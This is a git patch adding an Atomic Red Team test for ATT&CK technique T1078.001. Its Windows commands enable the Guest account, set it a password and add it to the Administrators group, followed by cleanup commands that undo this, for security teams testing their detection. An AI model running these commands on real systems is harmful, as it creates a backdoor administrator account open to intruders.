From 5a67b430217bb2a8623a84a497f9bbdaa21880eb Mon Sep 17 00:00:00 2001
From: Jesse Moore <jesse.f.moore@gmail.com>
Date: Thu, 6 Aug 2020 08:49:27 -0600
Subject: [PATCH] Create T1078.001 and yaml (#1178)

* Create T1078.001 and yaml

Creating Folder for sub technique and yaml for .001

* Update T1078.001.yaml

* Update T1078.001.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1078.001/T1078.001.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 atomics/T1078.001/T1078.001.yaml

diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml
new file mode 100644
index 00000000..c8813e44
--- /dev/null
+++ b/atomics/T1078.001/T1078.001.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1078.001
+display_name: 'Valid Accounts: Default Accounts'
+atomic_tests:
+- name: Enable Guest account
+  description: After execution the Default Guest account will be enabled (Active) and added to Administrators Group
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      net user guest /active:yes
+      net user guest Paswword123!
+      net localgroup administrators guest /add
+    cleanup_command: |-
+      net user guest /active:no
+      net localgroup administrators guest /delete
+    name: command_prompt
+    elevation_required: true